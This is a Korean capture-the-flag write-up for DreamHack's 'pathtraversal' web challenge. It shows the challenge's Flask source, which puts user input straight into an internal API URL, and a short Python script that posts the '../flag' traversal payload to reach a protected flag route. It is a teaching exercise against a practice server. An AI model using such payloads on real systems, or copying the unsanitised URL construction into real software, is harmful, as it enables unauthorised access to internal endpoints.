[DreamHack] 드림핵 웹해킹 : pathtraversal

https://dreamhack.io/wargame/challenges/12

pathtraversal

 

문제

사용자의 정보를 조회하는 API 서버입니다.
Path Traversal 취약점을 이용해 /api/flag에 있는 플래그를 획득하세요!

 

#!/usr/bin/python3
from flask import Flask, request, render_template, abort
from functools import wraps
import requests
import os, json

users = {
    '0': {
        'userid': 'guest',
        'level': 1,
        'password': 'guest'
    },
    '1': {
        'userid': 'admin',
        'level': 9999,
        'password': 'admin'
    }
}

def internal_api(func):
    @wraps(func)
    def decorated_view(*args, **kwargs):
        if request.remote_addr == '127.0.0.1':
            return func(*args, **kwargs)
        else:
            abort(401)
    return decorated_view

app = Flask(__name__)
app.secret_key = os.urandom(32)
API_HOST = 'http://127.0.0.1:8000'

try:
    FLAG = open('./flag.txt', 'r').read() # Flag is here!!
except:
    FLAG = '[**FLAG**]'

@app.route('/')
def index():
    return render_template('index.html')

@app.route('/get_info', methods=['GET', 'POST'])
def get_info():
    if request.method == 'GET':
        return render_template('get_info.html')
    elif request.method == 'POST':
        userid = request.form.get('userid', '')
        info = requests.get(f'{API_HOST}/api/user/{userid}').text
        return render_template('get_info.html', info=info)

@app.route('/api')
@internal_api
def api():
    return '/user/<uid>, /flag'

@app.route('/api/user/<uid>')
@internal_api
def get_flag(uid):
    try:
        info = users[uid]
    except:
        info = {}
    return json.dumps(info)

@app.route('/api/flag')
@internal_api
def flag():
    return FLAG

application = app # app.run(host='0.0.0.0', port=8000)
# Dockerfile
#     ENTRYPOINT ["uwsgi", "--socket", "0.0.0.0:8000", "--protocol=http", "--threads", "4", "--wsgi-file", "app.py"]

 

풀이

 

간단하게 이루어진 화면이다.

문제파일을 확인해보자

 

@app.route('/get_info', methods=['GET', 'POST'])
def get_info():
    if request.method == 'GET':
        return render_template('get_info.html')
    elif request.method == 'POST':
        userid = request.form.get('userid', '')
        info = requests.get(f'{API_HOST}/api/user/{userid}').text
        return render_template('get_info.html', info=info)

/get_info api를 이용하여 {"userid": 유저가입력한값} 을 request data로 하는 post 통신이 일어난다.

 

웹 서비스의 요청 URL에 이용자의 입력값이 포함되는 경우에 해당되기 떄문에

이용자의 입력값 중 URL의 구성 요소 문자를 삽입해서 API 경로를 조작하는 path traversal이 가능하다

 

우리가 필요한건 /api/flag 경로임으로 유저가 입력한 값을 넣는 userid 부분에 ../flag 만 넣으면

        info = requests.get(f'{API_HOST}/api/user/../flag').text
        #info = requests.get(f'{API_HOST}/api/flag').text 와 같음

이렇게 작동하게 된다

 

다만 웹사이트 내 userid 인풋에 입력하면 위 JS 로직에 의해 userid 값이 users[userid] 값으로 변하게 된다

 

JS를 조작할까 고민하다가 그냥 직접 api에 접근하는 방법으로 해당 JS 로직을 우회하기로 했다

(이 부분은 프록시를 이용하는 거라 버프스위트를 이용할 수 있지만, 나는 설치가 영 귀찮아서 (...) 그냥 파이썬과 구글코랩을 이용한다)

 

import requests

url="http://host3.dreamhack.games:13228/get_info"

response = requests.post(url, data={"userid": "../flag"})

print(response.text)

결과가 잘 나온다.

결과로 나온 코드의 본문을 보면 플래그가 이쁘게 나와있다